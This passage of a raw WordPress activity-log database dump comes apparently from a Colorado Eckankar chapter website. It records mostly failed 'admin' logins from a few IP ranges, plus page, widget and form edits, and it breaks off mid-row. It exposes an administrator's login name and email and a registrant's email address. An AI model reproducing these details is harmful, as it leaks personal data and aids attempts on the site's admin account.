2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231370,39155,'_user_email','nada@zipnadanot.org'),(231371,39155,'_server_remote_addr','76.130.120.x'),(231367,39155,'_message_key','post_updated'),(231368,39155,'_user_id','2'),(231369,39155,'_user_login','S8zhaBda'),(231372,39155,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(231373,39156,'menu_id','63'),(231374,39156,'menu_name','ECKCO Primary Menu'),(231375,39156,'menu_items_added','1'),(231376,39156,'menu_items_removed','0'),(231377,39156,'_message_key','edited_menu'),(231378,39156,'_user_id','2'),(231379,39156,'_user_login','S8zhaBda'),(231380,39156,'_user_email','nada@zipnadanot.org'),(231381,39156,'_server_remote_addr','76.130.120.x'),(231382,39156,'_server_http_referer','https://eckankar-colorado.org/wp-admin/nav-menus.php'),(231383,39157,'plugin_name','Modern Events Calendar'),(231384,39157,'plugin_current_version','7.2.1'),(231385,39157,'plugin_new_version','7.2.2'),(231386,39157,'_message_key','plugin_update_available'),(231387,39157,'_server_remote_addr','173.231.231.x'),(231388,39158,'failed_username','admin'),(231389,39158,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(231390,39158,'_message_key','user_unknown_login_failed'),(231391,39158,'_server_remote_addr','205.185.123.x'),(231392,39159,'failed_username','admin'),(231393,39159,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(231394,39159,'_message_key','user_unknown_login_failed'),(231395,39159,'_server_remote_addr','205.185.123.x'),(231396,39160,'failed_username','admin'),(231397,39160,'server_http_user_agent','Mozilla/5.0'),(231398,39160,'_message_key','user_unknown_login_failed'),(231399,39160,'_server_remote_addr','20.14.80.x'),(231400,39161,'failed_username','admin'),(231401,39161,'server_http_user_agent','Mozilla/5.0'),(231402,39161,'_message_key','user_unknown_login_failed'),(231403,39161,'_server_remote_addr','20.14.80.x'),(231404,39162,'failed_username','admin'),(231405,39162,'server_http_user_agent','Mozilla/5.0'),(231406,39162,'_message_key','user_unknown_login_failed'),(231407,39162,'_server_remote_addr','20.14.80.x'),(231408,39163,'failed_username','administrator'),(231409,39163,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(231410,39163,'_message_key','user_unknown_login_failed'),(231411,39163,'_server_remote_addr','199.195.250.x'),(231412,39164,'failed_username','admin'),(231413,39164,'server_http_user_agent','Mozilla/5.0'),(231414,39164,'_message_key','user_unknown_login_failed'),(231415,39164,'_server_remote_addr','20.14.80.x'),(231416,39165,'failed_username','admin'),(231417,39165,'server_http_user_agent','Mozilla/5.0'),(231418,39165,'_message_key','user_unknown_login_failed'),(231419,39165,'_server_remote_addr','20.14.80.x'),(231420,39166,'failed_username','admin'),(231421,39166,'server_http_user_agent','Mozilla/5.0'),(231422,39166,'_message_key','user_unknown_login_failed'),(231423,39166,'_server_remote_addr','20.14.80.x'),(231424,39167,'failed_username','admin'),(231425,39167,'server_http_user_agent','Mozilla/5.0'),(231426,39167,'_message_key','user_unknown_login_failed'),(231427,39167,'_server_remote_addr','20.14.80.x'),(231428,39168,'failed_username','admin'),(231429,39168,'server_http_user_agent','Mozilla/5.0'),(231430,39168,'_message_key','user_unknown_login_failed'),(231431,39168,'_server_remote_addr','20.14.80.x'),(231432,39169,'failed_username','admin'),(231433,39169,'server_http_user_agent','Mozilla/5.0'),(231434,39169,'_message_key','user_unknown_login_failed'),(231435,39169,'_server_remote_addr','20.14.80.x'),(231436,39170,'failed_username','admin'),(231437,39170,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3'),(231438,39170,'_message_key','user_unknown_login_failed'),(231439,39170,'_server_remote_addr','198.98.51.x'),(231440,39171,'failed_username','admin'),(231441,39171,'server_http_user_agent','Mozilla/5.0'),(231442,39171,'_message_key','user_unknown_login_failed'),(231443,39171,'_server_remote_addr','20.14.80.x'),(231444,39172,'widget_id_base','custom_html'),(231445,39172,'widget_name_translated','Custom HTML'),(231446,39172,'sidebar_id','null'),(231447,39172,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:60px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231448,39172,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:0px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231449,39172,'_message_key','widget_edited'),(231450,39172,'_user_id','2'),(231451,39172,'_user_login','S8zhaBda'),(231452,39172,'_user_email','nada@zipnadanot.org'),(231453,39172,'_server_remote_addr','76.130.120.x'),(231454,39172,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(231455,39173,'widget_id_base','custom_html'),(231456,39173,'widget_name_translated','Custom HTML'),(231457,39173,'sidebar_id','null'),(231458,39173,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:0px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(221685,36841,'failed_username','admin'),(221684,36840,'_server_remote_addr','45.136.118.x'),(221681,36840,'failed_username','admin'),(221682,36840,'server_http_user_agent','Mozilla/5.0'),(221683,36840,'_message_key','user_unknown_login_failed'),(220151,36480,'days','60'),(220152,36480,'num_rows','492'),(220153,36480,'_message_key','purged_events'),(220154,36480,'_wp_cron_running','true'),(220155,36480,'_server_remote_addr','173.231.231.x'),(220156,36481,'failed_username','admin'),(220157,36481,'server_http_user_agent','Mozilla/5.0'),(220158,36481,'_message_key','user_unknown_login_failed'),(220159,36481,'_server_remote_addr','45.136.118.x'),(220160,36482,'post_id','269177'),(220161,36482,'post_type','mec-books'),(220162,36482,'post_title','Lynn &#8211; lynnschultept@gmail.com'),(220163,36482,'_message_key','post_updated'),(220164,36482,'_server_remote_addr','8.44.153.x'),(220165,36482,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/?occurrence=2023-10-08'),(220166,36483,'failed_username','admin'),(220167,36483,'server_http_user_agent','Mozilla/5.0'),(220168,36483,'_message_key','user_unknown_login_failed'),(220169,36483,'_server_remote_addr','45.136.118.x'),(220170,36484,'failed_username','admin'),(220171,36484,'server_http_user_agent','Mozilla/5.0'),(220172,36484,'_message_key','user_unknown_login_failed'),(220173,36484,'_server_remote_addr','45.136.118.x'),(220174,36485,'failed_username','admin'),(220175,36485,'server_http_user_agent','Mozilla/5.0'),(220176,36485,'_message_key','user_unknown_login_failed'),(220177,36485,'_server_remote_addr','45.136.118.x'),(220178,36486,'failed_username','admin'),(220179,36486,'server_http_user_agent','Mozilla/5.0'),(220180,36486,'_message_key','user_unknown_login_failed'),(220181,36486,'_server_remote_addr','45.136.118.x'),(220182,36487,'failed_username','admin'),(220183,36487,'server_http_user_agent','Mozilla/5.0'),(220184,36487,'_message_key','user_unknown_login_failed'),(220185,36487,'_server_remote_addr','45.136.118.x'),(220186,36488,'failed_username','admin'),(220187,36488,'server_http_user_agent','Mozilla/5.0'),(220188,36488,'_message_key','user_unknown_login_failed'),(220189,36488,'_server_remote_addr','45.136.118.x'),(220190,36489,'post_id','269178'),(220191,36489,'post_type','nf_sub'),(220192,36489,'post_title',''),(220193,36489,'_message_key','post_updated'),(220194,36489,'_server_remote_addr','107.2.161.x'),(220195,36489,'_server_http_referer','https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/'),(220196,36490,'failed_username','admin'),(220197,36490,'server_http_user_agent','Mozilla/5.0'),(220198,36490,'_message_key','user_unknown_login_failed'),(220199,36490,'_server_remote_addr','45.136.118.x'),(220200,36491,'failed_username','admin'),(220201,36491,'server_http_user_agent','Mozilla/5.0'),(220202,36491,'_message_key','user_unknown_login_failed'),(220203,36491,'_server_remote_addr','45.136.118.x'),(220204,36492,'failed_username','admin'),(220205,36492,'server_http_user_agent','Mozilla/5.0'),(220206,36492,'_message_key','user_unknown_login_failed'),(220207,36492,'_server_remote_addr','45.136.118.x'),(220208,36493,'failed_username','admin'),(220209,36493,'server_http_user_agent','Mozilla/5.0'),(220210,36493,'_message_key','user_unknown_login_failed'),(220211,36493,'_server_remote_addr','45.136.118.x'),(220212,36494,'failed_username','admin'),(220213,36494,'server_http_user_agent','Mozilla/5.0'),(220214,36494,'_message_key','user_unknown_login_failed'),(220215,36494,'_server_remote_addr','45.136.118.x'),(220216,36495,'failed_username','admin'),(220217,36495,'server_http_user_agent','Mozilla/5.0'),(220218,36495,'_message_key','user_unknown_login_failed'),(220219,36495,'_server_remote_addr','45.136.118.x'),(220220,36496,'failed_username','admin'),(220221,36496,'server_http_user_agent','Mozilla/5.0'),(220222,36496,'_message_key','user_unknown_login_failed'),(220223,36496,'_server_remote_addr','45.136.118.x'),(220224,36497,'failed_username','admin'),(220225,36497,'server_http_user_agent','Mozilla/5.0'),(220226,36497,'_message_key','user_unknown_login_failed'),(220227,36497,'_server_remote_addr','45.136.118.x'),(220228,36498,'failed_username','admin'),(220229,36498,'server_http_user_agent','Mozilla/5.0'),(220230,36498,'_message_key','user_unknown_login_failed'),(220231,36498,'_server_remote_addr','45.136.118.x'),(220232,36499,'failed_username','admin'),(220233,36499,'server_http_user_agent','Mozilla/5.0'),(220234,36499,'_message_key','user_unknown_login_failed'),(220235,36499,'_server_remote_addr','45.136.118.x'),(220236,36500,'failed_username','admin'),(220237,36500,'server_http_user_agent','Mozilla/5.0'),(220238,36500,'_message_key','user_unknown_login_failed'),(220239,36500,'_server_remote_addr','45.136.118.x'),(220240,36501,'failed_username','admin'),(220241,36501,'server_http_user_agent','Mozilla/5.0'),(220242,36501,'_message_key','user_unknown_login_failed'),(220243,36501,'_server_remote_addr','45.136.118.x'),(220244,36502,'failed_username','admin'),(220245,36502,'server_http_user_agent','Mozilla/5.0'),(220246,36502,'_message_key','user_unknown_login_failed'),(220247,36502,'_server_remote_addr','45.136.118.x'),(220248,36503,'failed_username','admin'),(220249,36503,'server_http_user_agent','Mozilla/5.0'),(220250,36503,'_message_key','user_unknown_login_failed'),(220251,36503,'_server_remote_addr','45.136.118.x'),(220252,36504,'failed_username','admin'),(220253,36504,'server_http_user_agent','Mozilla/5.0'),(220254,36504,'_message_key','user_unknown_login_failed'),(220255,36504,'_server_remote_addr','45.136.118.x'),(220256,36505,'failed_username','admin'),(220257,36505,'server_http_user_agent','Mozilla/5.0'),(220258,36505,'_message_key','user_unknown_login_failed'),(220259,36505,'_server_remote_addr','45.136.118.x'),(220260,36506,'failed_username','admin'),(220261,36506,'server_http_user_agent','Mozilla/5.0'),(220262,36506,'_message_key','user_unknown_login_failed'),(220263,36506,'_server_remote_addr','45.136.118.x'),(220264,36507,'failed_username','admin'),(220265,36507,'server_http_user_agent','Mozilla/5.0'),(220266,36507,'_message_key','user_unknown_login_failed'),(220267,36507,'_server_remote_addr','45.136.118.x'),(220268,36508,'failed_username','admin'),(220269,36508,'server_http_user_agent','Mozilla/5.0'),(220270,36508,'_message_key','user_unknown_login_failed'),(220271,36508,'_server_remote_addr','45.136.118.x'),(220272,36509,'failed_username','admin'),(220273,36509,'server_http_user_agent','Mozilla/5.0'),(220274,36509,'_message_key','user_unknown_login_failed'),(220275,36509,'_server_remote_addr','45.136.118.x'),(220276,36510,'failed_username','admin'),(220277,36510,'server_http_user_agent','Mozilla/5.0'),(220278,36510,'_message_key','user_unknown_login_failed'),(220279,36510,'_server_remote_addr','45.136.118.x'),(220280,36511,'failed_username','admin'),(220281,36511,'server_http_user_agent','Mozilla/5.0'),(220282,36511,'_message_key','user_unknown_login_failed'),(220283,36511,'_server_remote_addr','45.136.118.x'),(220284,36512,'failed_username','admin'),(220285,36512,'server_http_user_agent','Mozilla/5.0'),(220286,36512,'_message_key','user_unknown_login_failed'),(220287,36512,'_server_remote_addr','45.136.118.x'),(220288,36513,'failed_username','admin'),(220289,36513,'server_http_user_agent','Mozilla/5.0'),(220290,36513,'_message_key','user_unknown_login_failed'),(220291,36513,'_server_remote_addr','45.136.118.x'),(220292,36514,'failed_username','admin'),(220293,36514,'server_http_user_agent','Mozilla/5.0'),(220294,36514,'_message_key','user_unknown_login_failed'),(220295,36514,'_server_remote_addr','45.136.118.x'),(220296,36515,'failed_username','admin'),(220297,36515,'server_http_user_agent','Mozilla/5.0'),(220298,36515,'_message_key','user_unknown_login_failed'),(220299,36515,'_server_remote_addr','45.136.118.x'),(220300,36516,'failed_username','admin'),(220301,36516,'server_http_user_agent','Mozilla/5.0'),(220302,36516,'_message_key','user_unknown_login_failed'),(220303,36516,'_server_remote_addr','45.136.118.x'),(220304,36517,'failed_username','admin'),(220305,36517,'server_http_user_agent','Mozilla/5.0'),(220306,36517,'_message_key','user_unknown_login_failed'),(220307,36517,'_server_remote_addr','45.136.118.x'),(220308,36518,'failed_username','admin'),(220309,36518,'server_http_user_agent','Mozilla/5.0'),(220310,36518,'_message_key','user_unknown_login_failed'),(220311,36518,'_server_remote_addr','45.136.118.x'),(220312,36519,'failed_username','admin'),(220313,36519,'server_http_user_agent','Mozilla/5.0'),(220314,36519,'_message_key','user_unknown_login_failed'),(220315,36519,'_server_remote_addr','45.136.118.x'),(220316,36520,'failed_username','admin'),(220317,36520,'server_http_user_agent','Mozilla/5.0'),(220318,36520,'_message_key','user_unknown_login_failed'),(220319,36520,'_server_remote_addr','45.136.118.x'),(220320,36521,'failed_username','admin'),(220321,36521,'server_http_user_agent','Mozilla/5.0'),(220322,36521,'_message_key','user_unknown_login_failed'),(220323,36521,'_server_remote_addr','45.136.118.x'),(220324,36522,'failed_username','admin'),(220325,36522,'server_http_user_agent','Mozilla/5.0'),(220326,36522,'_message_key','user_unknown_login_failed'),(220327,36522,'_server_remote_addr','45.136.118.x'),(220328,36523,'failed_username','admin'),(220329,36523,'server_http_user_agent','Mozilla/5.0'),(220330,36523,'_message_key','user_unknown_login_failed'),(220331,36523,'_server_remote_addr','45.136.118.x'),(220332,36524,'failed_username','admin'),(220333,36524,'server_http_user_agent','Mozilla/5.0'),(220334,36524,'_message_key','user_unknown_login_failed'),(220335,36524,'_server_remote_addr','45.136.118.x'),(220336,36525,'failed_username','admin'),(220337,36525,'server_http_user_agent','Mozilla/5.0'),(220338,36525,'_message_key','user_unknown_login_failed'),(220339,36525,'_server_remote_addr','45.136.118.x'),(220340,36526,'failed_username','admin'),(220341,36526,'server_http_user_agent','Mozilla/5.0'),(220342,36526,'_message_key','user_unknown_login_failed'),(220343,36526,'_server_remote_addr','45.136.118.x'),(220344,36527,'failed_username','admin'),(220345,36527,'server_http_user_agent','Mozilla/5.0'),(220346,36527,'_message_key','user_unknown_login_failed'),(220347,36527,'_server_remote_addr','45.136.118.x'),(220348,36528,'failed_username','admin'),(220349,36528,'server_http_user_agent','Mozilla/5.0'),(220350,36528,'_message_key','user_unknown_login_failed'),(220351,36528,'_server_remote_addr','45.136.118.x'),(220352,36529,'failed_username','admin'),(220353,36529,'server_http_user_agent','Mozilla/5.0'),(220354,36529,'_message_key','user_unknown_login_failed'),(220355,36529,'_server_remote_addr','45.136.118.x'),(220356,36530,'failed_username','admin'),(220357,36530,'server_http_user_agent','Mozilla/5.0'),(220358,36530,'_message_key','user_unknown_login_failed'),(220359,36530,'_server_remote_addr','45.136.118.x'),(220360,36531,'failed_username','admin'),(220361,36531,'server_http_user_agent','Mozilla/5.0'),(220362,36531,'_message_key','user_unknown_login_failed'),(220363,36531,'_server_remote_addr','45.136.118.x'),(220364,36532,'failed_username','admin'),(220365,36532,'server_http_user_agent','Mozilla/5.0'),(220366,36532,'_message_key','user_unknown_login_failed'),(220367,36532,'_server_remote_addr','45.136.118.x'),(220368,36533,'failed_username','admin'),(220369,36533,'server_http_user_agent','Mozilla/5.0'),(220370,36533,'_message_key','user_unknown_login_failed'),(220371,36533,'_server_remote_addr','45.136.118.x'),(220372,36534,'failed_username','admin'),(220373,36534,'server_http_user_agent','Mozilla/5.0'),(220374,36534,'_message_key','user_unknown_login_failed'),(220375,36534,'_server_remote_addr','45.136.118.x'),(220376,36535,'failed_username','admin'),(220377,36535,'server_http_user_agent','Mozilla/5.0'),(220378,36535,'_message_key','user_unknown_login_failed'),(220379,36535,'_server_remote_addr','45.136.118.x'),(220380,36536,'failed_username','admin'),(220381,36536,'server_http_user_agent','Mozilla/5.0'),(220382,36536,'_message_key','user_unknown_login_failed'),(220383,36536,'_server_remote_addr','45.136.118.x'),(220384,36537,'failed_username','admin'),(220385,36537,'server_http_user_agent','Mozilla/5.0'),(220386,36537,'_message_key','user_unknown_login_failed'),(220387,36537,'_server_remote_addr','45.136.118.x'),(220388,36538,'failed_username','admin'),(220389,36538,'server_http_user_agent','Mozilla/5.0'),(220390,36538,'_message_key','user_unknown_login_failed'),(220391,36538,'_server_remote_addr','45.136.118.x'),(220392,36539,'failed_username','admin'),(220393,36539,'server_http_user_agent','Mozilla/5.0'),(220394,36539,'_message_key','user_unknown_login_failed'),(220395,36539,'_server_remote_addr','45.136.118.x'),(220396,36540,'failed_username','admin'),(220397,36540,'server_http_user_agent','Mozilla/5.0'),(220398,36540,'_message_key','user_unknown_login_failed'),(220399,36540,'_server_remote_addr','45.136.118.x'),(220400,36541,'failed_username','admin'),(220401,36541,'server_http_user_agent','Mozilla/5.0'),(220402,36541,'_message_key','user_unknown_login_failed'),(220403,36541,'_server_remote_addr','45.136.118.x'),(220404,36542,'failed_username','admin'),(220405,36542,'server_http_user_agent','Mozilla/5.0'),(220406,36542,'_message_key','user_unknown_login_failed'),(220407,36542,'_server_remote_addr','45.136.118.x'),(220408,36543,'failed_username','admin'),(220409,36543,'server_http_user_agent','Mozilla/5.0'),(220410,36543,'_message_key','user_unknown_login_failed'),(220411,36543,'_server_remote_addr','45.136.118.x'),(220412,36544,'failed_username','admin'),(220413,36544,'server_http_user_agent','Mozilla/5.0'),(220414,36544,'_message_key','user_unknown_login_failed'),(220415,36544,'_server_remote_addr','45.136.118.x'),(220416,36545,'failed_username','admin'),(220417,36545,'server_http_user_agent','Mozilla/5.0'),(220418,36545,'_message_key','user_unknown_login_failed'),(220419,36545,'_server_remote_addr','45.136.118.x'),(220420,36546,'failed_username','admin'),(220421,36546,'server_http_user_agent','Mozilla/5.0'),(220422,36546,'_message_key','user_unknown_login_failed'),(220423,36546,'_server_remote_addr','45.136.118.x'),(220424,36547,'failed_username','admin'),(220425,36547,'server_http_user_agent','Mozilla/5.0'),(220426,36547,'_message_key','user_unknown_login_failed'),(220427,36547,'_server_remote_addr','45.136.118.x'),(220428,36548,'failed_username','admin'),(220429,36548,'server_http_user_agent','Mozilla/5.0'),(220430,36548,'_message_key','user_unknown_login_failed'),(220431,36548,'_server_remote_addr','45.136.118.x'),(220432,36549,'failed_username','admin'),(220433,36549,'server_http_user_agent','Mozilla/5.0'),(220434,36549,'_message_key','user_unknown_login_failed'),(220435,36549,'_server_remote_addr','45.136.118.x'),(220436,36550,'failed_username','admin'),(220437,36550,'server_http_user_agent','Mozilla/5.0'),(220438,36550,'_message_key','user_unknown_login_failed'),(220439,36550,'_server_remote_addr','45.136.118.x'),(220440,36551,'failed_username','admin'),(220441,36551,'server_http_user_agent','Mozilla/5.0'),(220442,36551,'_message_key','user_unknown_login_failed'),(220443,36551,'_server_remote_addr','45.136.118.x'),(220444,36552,'failed_username','admin'),(220445,36552,'server_http_user_agent','Mozilla/5.0'),(220446,36552,'_message_key','user_unknown_login_failed'),(220447,36552,'_server_remote_addr','45.136.118.x'),(220448,36553,'failed_username','admin'),(220449,36553,'server_http_user_agent','Mozilla/5.0'),(220450,36553,'_message_key','user_unknown_login_failed'),(220451,36553,'_server_remote_addr','45.136.118.x'),(220452,36554,'failed_username','admin'),(220453,36554,'server_http_user_agent','Mozilla/5.0'),(220454,36554,'_message_key','user_unknown_login_failed'),(220455,36554,'_server_remote_addr','45.136.118.x'),(220456,36555,'failed_username','admin'),(220457,36555,'server_http_user_agent','Mozilla/5.0'),(220458,36555,'_message_key','user_unknown_login_failed'),(220459,36555,'_server_remote_addr','45.136.118.x'),(220460,36556,'failed_username','admin'),(220461,36556,'server_http_user_agent','Mozilla/5.0'),(220462,36556,'_message_key','user_unknown_login_failed'),(220463,36556,'_server_remote_addr','45.136.118.x'),(220464,36557,'failed_username','admin'),(220465,36557,'server_http_user_agent','Mozilla/5.0'),(220466,36557,'_message_key','user_unknown_login_failed'),(220467,36557,'_server_remote_addr','45.136.118.x'),(220468,36558,'post_id','269179'),(220469,36558,'post_type','nf_sub'),(220470,36558,'post_title',''),(220471,36558,'_message_key','post_updated'),(220472,36558,'_server_remote_addr','136.36.92.x'),(220473,36558,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(220474,36559,'failed_username','admin'),(220475,36559,'server_http_user_agent','Mozilla/5.0'),(220476,36559,'_message_key','user_unknown_login_failed'),(220477,36559,'_server_remote_addr','45.136.118.x'),(220478,36560,'failed_username','admin'),(220479,36560,'server_http_user_agent','Mozilla/5.0'),(220480,36560,'_message_key','user_unknown_login_failed'),(220481,36560,'_server_remote_addr','45.136.118.x'),(220482,36561,'failed_username','admin'),(220483,36561,'server_http_user_agent','Mozilla/5.0'),(220484,36561,'_message_key','user_unknown_login_failed'),(220485,36561,'_server_remote_addr','45.136.118.x'),(220486,36562,'failed_username','admin'),(220487,36562,'server_http_user_agent','Mozilla/5.0'),(220488,36562,'_message_key','user_unknown_login_failed'),(220489,36562,'_server_remote_addr','45.136.118.x'),(220490,36563,'failed_username','admin'),(220491,36563,'server_http_user_agent','Mozilla/5.0'),(220492,36563,'_message_key','user_unknown_login_failed'),(220493,36563,'_server_remote_addr','45.136.118.x'),(220494,36564,'failed_username','admin'),(220495,36564,'server_http_user_agent','Mozilla/5.0'),(220496,36564,'_message_key','user_unknown_login_failed'),(220497,36564,'_server_remote_addr','45.136.118.x'),(220498,36565,'failed_username','admin'),(220499,36565,'server_http_user_agent','Mozilla/5.0'),(220500,36565,'_message_key','user_unknown_login_failed'),(220501,36565,'_server_remote_addr','45.136.118.x'),(220502,36566,'failed_username','admin'),(220503,36566,'server_http_user_agent','Mozilla/5.0'),(220504,36566,'_message_key','user_unknown_login_failed'),(220505,36566,'_server_remote_addr','45.136.118.x'),(220506,36567,'failed_username','admin'),(220507,36567,'server_http_user_agent','Mozilla/5.0'),(220508,36567,'_message_key','user_unknown_login_failed'),(220509,36567,'_server_remote_addr','45.136.118.x'),(220510,36568,'failed_username','admin'),(220511,36568,'server_http_user_agent','Mozilla/5.0'),(220512,36568,'_message_key','user_unknown_login_failed'),(220513,36568,'_server_remote_addr','45.136.118.x'),(220514,36569,'failed_username','admin'),(220515,36569,'server_http_user_agent','Mozilla/5.0'),(220516,36569,'_message_key','user_unknown_login_failed'),(220517,36569,'_server_remote_addr','45.136.118.x'),(220518,36570,'failed_username','admin'),(220519,36570,'server_http_user_agent','Mozilla/5.0'),(220520,36570,'_message_key','user_unknown_login_failed'),(220521,36570,'_server_remote_addr','45.136.118.x'),(220522,36571,'failed_username','admin'),(220523,36571,'server_http_user_agent','Mozilla/5.0'),(220524,36571,'_message_key','user_unknown_login_failed'),(220525,36571,'_server_remote_addr','45.136.118.x'),(220526,36572,'failed_username','admin'),(220527,36572,'server_http_user_agent','Mozilla/5.0'),(220528,36572,'_message_key','user_unknown_login_failed'),(220529,36572,'_server_remote_addr','45.136.118.x'),(220530,36573,'failed_username','admin'),(220531,36573,'server_http_user_agent','Mozilla/5.0'),(220532,36573,'_message_key','user_unknown_login_failed'),(220533,36573,'_server_remote_addr','45.136.118.x'),(220534,36574,'failed_username','admin'),(220535,36574,'server_http_user_agent','Mozilla/5.0'),(220536,36574,'_message_key','user_unknown_login_failed'),(220537,36574,'_server_remote_addr','45.136.118.x'),(220538,36575,'failed_username','admin'),(220539,36575,'server_http_user_agent','Mozilla/5.0'),(220540,36575,'_message_key','user_unknown_login_failed'),(220541,36575,'_server_remote_addr','45.136.118.x'),(220542,36576,'failed_username','admin'),(220543,36576,'server_http_user_agent','Mozilla/5.0'),(220544,36576,'_message_key','user_unknown_login_failed'),(220545,36576,'_server_remote_addr','45.136.118.x'),(220546,36577,'failed_username','admin'),(220547,36577,'server_http_user_agent','Mozilla/5.0'),(220548,36577,'_message_key','user_unknown_login_failed'),(220549,36577,'_server_remote_addr','45.136.118.x'),(220550,36578,'failed_username','admin'),(220551,36578,'server_http_user_agent','Mozilla/5.0'),(220552,36578,'_message_key','user_unknown_login_failed'),(220553,36578,'_server_remote_addr','45.136.118.x'),(220554,36579,'failed_username','admin'),(220555,36579,'server_http_user_agent','Mozilla/5.0'),(220556,36579,'_message_key','user_unknown_login_failed'),(220557,36579,'_server_remote_addr','45.136.118.x'),(220558,36580,'failed_username','admin'),(220559,36580,'server_http_user_agent','Mozilla/5.0'),(220560,36580,'_message_key','user_unknown_login_failed'),(220561,36580,'_server_remote_addr','45.136.118.x'),(220562,36581,'failed_username','admin'),(220563,36581,'server_http_user_agent','Mozilla/5.0'),(220564,36581,'_message_key','user_unknown_login_failed'),(220565,36581,'_server_remote_addr','45.136.118.x'),(220566,36582,'failed_username','admin'),(220567,36582,'server_http_user_agent','Mozilla/5.0'),(220568,36582,'_message_key','user_unknown_login_failed'),(220569,36582,'_server_remote_addr','45.136.118.x'),(220570,36583,'failed_username','admin'),(220571,36583,'server_http_user_agent','Mozilla/5.0'),(220572,36583,'_message_key','us